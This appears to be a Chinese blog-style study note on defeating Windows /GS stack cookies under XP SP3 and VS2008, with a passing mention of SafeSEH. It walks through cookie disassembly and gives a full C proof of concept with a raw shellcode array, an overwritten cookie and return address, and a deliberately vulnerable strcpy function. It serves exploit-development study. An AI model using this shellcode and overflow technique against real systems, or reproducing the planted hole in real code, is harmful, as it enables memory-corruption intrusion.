首先 如果想直接覆盖 一场回调函数去劫持EXE的话 ,SafeSEH会阻止程序去执行;
SafeSEH的原理很简单,就是对要调用的异常回调函数进行一系列对的有效性校验 需要 操作系统XP SP2 及后续版本 和编译器的双重支持
下面说明GS的突破
但感觉还是有点困难: 1 要么程序写了虚函数 2要么程序主动去修改 COOKIE的值· 3 最好的方法直接覆盖 SEH 典型SEH 溢出即可
···感觉不会再爱了
加了GS后 取的COOKIE:
00401000 55 push ebp
00401001 8BEC mov ebp,esp
00401003 81EC E4000000 sub esp,0xE4
00401009 A1 00304000 mov eax,dword ptr ds:[0x403000]
//取.data段数据 下面于 ebp 相xor 得到 cookie
0040100E 33C5 xor eax,ebp
00401010 8945 FC mov dword ptr ss:[ebp-0x4],eax
00401013 817D 0C 9599000>cmp dword ptr ss:[ebp+0xC],0x9995
0040101A 0F8D AA000000 jge vs2005TE.004010CA
开始时将 0x403000 处取出COKIE值,然后与EBP做一次异或放入 EBP-4的位置作为 此函数的Security Cookie
函数返回前的校验就是此过程的逆过程,程序将
1 EBP-4的位置取出值,
2 然后与EBP异或
3 最后于 0x00403000处的COOKIE相比较
/*
XP SP3
VS2008 GS保护 禁止优化
*/
#include <stdafx.h>
#include <windows.h>
char shellcode[]=
"\x90\x90\x90\x90"
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53"
"\x68\x64\x61\x30\x23"
"\x68\x23\x50\x61\x6E"
"\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8"//168
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"//注意这里 尽量将90放在后面 放在前面有问题!!!
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90"
"\xf4\x6f\x82\x90" //cookie 90826FF4 倒叙 我是通过 编码直接得到 是单个字节xor
"\x90\x90\x90\x90" //ebp 原来是 0012ff64
"\x94\xFE\x12\x00" //0012FE94 为返回地址
;
void test(char * S,int i,char * src)
{
char dest[200];
if (i<0x9995)
{
char * buf = S+i;
*buf = *src;
*(buf+1) = *(src+1);
*(buf+2) = *(src+2);
*(buf+3) = *(src+3);
strcpy(dest,src);
}
}
int main()
{
char * str = (char *)malloc(0x10000);
test(str,0xFFFF2FB8,shellcode);
//.data 0x403000
//malloc 0x410048 相减 D048
//FFFFFFFF - D048 + 1= FFFF2FB8
}
最后成功: